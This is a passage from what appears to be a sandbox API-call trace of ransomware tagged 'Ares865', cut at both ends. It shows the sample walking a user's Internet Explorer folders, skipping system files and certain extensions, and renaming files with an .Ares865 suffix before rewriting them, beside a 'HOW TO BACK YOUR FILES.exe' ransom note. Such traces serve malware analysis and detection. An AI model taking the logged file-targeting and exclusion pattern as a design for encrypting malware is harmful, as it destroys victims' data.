param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat.Ares865") returned 144 [0099.512] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat.ares865"), dwFlags=0x1) returned 1 [0099.514] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Last Active\\{69512155-C8F9-11E7-B5BF-C43DC7584A00}.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\recovery\\last active\\{69512155-c8f9-11e7-b5bf-c43dc7584a00}.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.514] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4608) returned 1 [0099.517] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Active", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Active") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\Recovery\\Active" [0099.518] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore" [0099.518] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.Ares865") returned 99 [0099.518] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\domstore\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\domstore\\index.dat.ares865"), dwFlags=0x1) returned 1 [0099.520] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\internet explorer\\domstore\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.520] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0099.526] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\OWLVMZRC" [0099.526] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\FKLUIDU0" [0099.527] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\8NES5H33" [0099.527] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Internet Explorer\\DOMStore\\3LKBQZJ3" [0099.527] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\IMJP9_0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\IMJP9_0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\IMJP9_0" [0099.528] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\IMJP8_1", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\IMJP8_1") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\IMJP8_1" [0099.528] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\IMJP12", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\IMJP12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\IMJP12" [0099.529] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\IME12", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\IME12") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\IME12" [0099.529] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\FORMS", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\FORMS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\FORMS" [0099.529] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\FORMS\\FRMCACHE.DAT.Ares865") returned 81 [0099.529] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\FORMS\\FRMCACHE.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\forms\\frmcache.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\FORMS\\FRMCACHE.DAT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\forms\\frmcache.dat.ares865"), dwFlags=0x1) returned 1 [0099.531] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\FORMS\\FRMCACHE.DAT.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\forms\\frmcache.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.531] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=245980) returned 1 [0099.562] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache" [0099.562] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\desktop.ini.Ares865") returned 86 [0099.562] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0099.564] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.565] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0099.568] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\index.dat.Ares865") returned 84 [0099.568] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\index.dat.ares865"), dwFlags=0x1) returned 1 [0099.569] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\index.dat.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.570] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32768) returned 1 [0099.574] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD" [0099.574] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.Ares865") returned 95 [0099.574] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0099.575] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.576] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0099.579] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].Ares865") returned 93 [0099.579] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1].ares865"), dwFlags=0x1) returned 1 [0099.580] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\fwlink[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.581] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.581] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.581] CloseHandle (hObject=0x0) returned 0 [0099.581] CloseHandle (hObject=0x118) returned 1 [0099.581] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dcf8cc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dcf8cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0099.581] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0099.581] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2000, ftCreationTime.dwLowDateTime=0x52d90010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52d90010, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52d90010, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ieonline.microsoft[1]", cAlternateFileName="IEONLI~1.MIC")) returned 1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="aoldtz.exe") returned 1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2=".") returned 1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="..") returned 1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="windows") returned -1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="bootmgr") returned 1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="temp") returned -1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="pagefile.sys") returned -1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="boot") returned 1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="ids.txt") returned 1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="ntuser.dat") returned -1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="perflogs") returned -1 [0099.581] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2="MSBuild") returned -1 [0099.581] lstrlenW (lpString="ieonline.microsoft[1]") returned 21 [0099.581] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\fwlink[1]") returned 85 [0099.581] lstrcpyW (in: lpString1=0x2cce498, lpString2="ieonline.microsoft[1]" | out: lpString1="ieonline.microsoft[1]") returned="ieonline.microsoft[1]" [0099.581] lstrlenW (lpString="ieonline.microsoft[1]") returned 21 [0099.581] lstrlenW (lpString="Ares865") returned 7 [0099.581] lstrcmpiW (lpString1="soft[1]", lpString2="Ares865") returned 1 [0099.582] lstrlenW (lpString=".dll") returned 4 [0099.582] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2=".dll") returned 1 [0099.582] lstrlenW (lpString=".lnk") returned 4 [0099.582] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2=".lnk") returned 1 [0099.582] lstrlenW (lpString=".ini") returned 4 [0099.582] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2=".ini") returned 1 [0099.582] lstrlenW (lpString=".sys") returned 4 [0099.582] lstrcmpiW (lpString1="ieonline.microsoft[1]", lpString2=".sys") returned 1 [0099.582] lstrlenW (lpString="ieonline.microsoft[1]") returned 21 [0099.582] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\ieonline.microsoft[1].Ares865") returned 105 [0099.582] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\ieonline.microsoft[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\ieonline.microsoft[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\ieonline.microsoft[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\ieonline.microsoft[1].ares865"), dwFlags=0x1) returned 1 [0099.583] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\KQMHSVKD\\ieonline.microsoft[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\kqmhsvkd\\ieonline.microsoft[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.584] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.584] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.584] CloseHandle (hObject=0x0) returned 0 [0099.584] CloseHandle (hObject=0x118) returned 1 [0099.584] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2000, ftCreationTime.dwLowDateTime=0x52d90010, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x52d90010, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x52d90010, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ieonline.microsoft[1]", cAlternateFileName="IEONLI~1.MIC")) returned 0 [0099.584] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0099.584] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a30 [0099.584] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ" [0099.584] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.Ares865") returned 95 [0099.584] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\d68g7bij\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0099.587] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\d68g7bij\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.587] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=67) returned 1 [0099.590] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].Ares865") returned 93 [0099.590] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\d68g7bij\\fwlink[1]"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\d68g7bij\\fwlink[1].ares865"), dwFlags=0x1) returned 1 [0099.591] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\D68G7BIJ\\fwlink[1].Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\d68g7bij\\fwlink[1].ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0099.592] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0099.592] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0099.592] CloseHandle (hObject=0x0) returned 0 [0099.592] CloseHandle (hObject=0x118) returned 1 [0099.592] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dcf8cc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dcf8cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0099.592] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0099.592] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4dcf8cc0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4dcf8cc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0099.592] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0099.592] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a10 [0099.592] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7" [0099.593] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini.Ares865") returned 95 [0099.593] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds Cache\\6ASVN7J7\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\microsoft\\feeds cache\\6asvn7j7\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Microsoft\\Feeds 